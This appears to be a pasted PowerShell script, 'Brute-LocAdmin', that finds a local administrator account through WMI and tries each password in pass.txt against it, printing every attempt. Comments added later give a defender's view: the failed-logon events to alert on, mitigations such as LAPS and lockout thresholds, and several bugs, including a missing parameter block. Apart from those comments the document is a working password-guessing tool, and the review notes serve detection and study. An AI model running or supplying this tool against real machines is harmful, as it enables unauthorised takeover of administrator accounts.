
Untitled

a guest
Nov 4th, 2018
  <#
  .Synopsis
  Brute-forces local Administrator account, if no name is provided it will attempt to find this by searching the local administrators group using WMI
  .DESCRIPTION
  Brute-forces local Administrator account, if no name is provided it will attempt to find this by searching the local administrators group using WMI.
  Every line of pass.txt (read from the current directory) is tried against the
  local machine account store, and one Username/Password/IsValid object is
  written to the pipeline per attempt.
  .EXAMPLE
  PS C:\> Brute-LocAdmin -Username Adm-User
  .NOTES
  Review notes (defender view):
  - Each attempt is a local credential validation. Failed validations are
    typically recorded as failed logons (Security event 4625) when logon
    auditing is enabled, so a burst of failures for one local account from a
    single PowerShell process is the signal to alert on.
  - The output objects carry every candidate password in clear text, so any
    transcript or script-block log of a run will contain them.
  - Mitigations that blunt this technique: an account lockout threshold,
    unique random local administrator passwords per host (e.g. Windows LAPS),
    and disabling or renaming the built-in Administrator account.
  - NOTE(review): no Param() block is visible on Brute-LocAdmin in this paste,
    so $username and $StopOnSuccess are only read from whatever scope already
    defines them; the .EXAMPLE above does not match the code as shown.
  #>
  Function Brute-LocAdmin
  {
      # Loads the assembly that provides PrincipalContext for the helper below.
      Add-Type -assemblyname System.DirectoryServices.AccountManagement

      # Helper: validates one username/password pair against the local machine
      # (ContextType Machine) and returns an object with Username, Password and
      # IsValid. IsValid holds the string form of the boolean result.
      Function Test-LocAdminCred
      {
          Param($username, $password)
          # $computer is assigned here but not used anywhere else in this helper.
          $computer = $env:COMPUTERNAME
          $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
          # Select-Object on an empty PSObject creates the three empty properties.
          $object = New-Object PSObject | Select-Object Username, Password, IsValid
          $object.Username = $username;
          $object.Password = $password;
          $object.IsValid = $DS.ValidateCredentials($username, $password).ToString();
          return $object
      }

      # No username available: default to 'Administrator', then look through the
      # Win32_GroupUser associations for members of a group named "Administrators".
      if (!$username)
      {
          $username = 'Administrator'
          $admins = Get-WmiObject win32_groupuser
          $admins = $admins |? {$_.groupcomponent -like '*"Administrators"'}

          $admins |% {
              # Skip members that are themselves groups; only user entries are parsed.
              if (!$_.partcomponent.contains("Win32_Group")) {
                  # -match fills the automatic $matches variable; the boolean result
                  # is redirected to $nul, which is not assigned in this block
                  # (presumably $null was intended - confirm).
                  $_.partcomponent -match ".+Domain\=(.+)\,Name\=(.+)$" > $nul
                  # NOTE(review): this message is written before $username is
                  # updated on the next line, so it reports the previous value.
                  Write-Host "Administrator not provided, found user: $username"
                  # Every matching member overwrites $username, so the last one
                  # enumerated is the name used below.
                  $username = $matches[2].trim('"')
              }
          }
      }

      # Candidate list: one password per line, relative to the current location.
      $allpasswords = Get-Content pass.txt
      # $counter is incremented in the loop but never read in this block.
      $counter = 0

      foreach ($password in $allpasswords)
      {
          $counter++
          $result = Test-LocAdminCred $username $password
          # Emits the attempt (including the clear-text password) to the pipeline.
          $result
          # $StopOnSuccess is not defined in this block; when it equals 'True' and
          # the attempt validated, the result is emitted a second time and the
          # loop ends.
          if (($StopOnSuccess -eq 'True') -and ($result.IsValid -eq 'True')){
              $break = $true
              $result
          }
          if ($break -eq 'True'){break}
      }
  }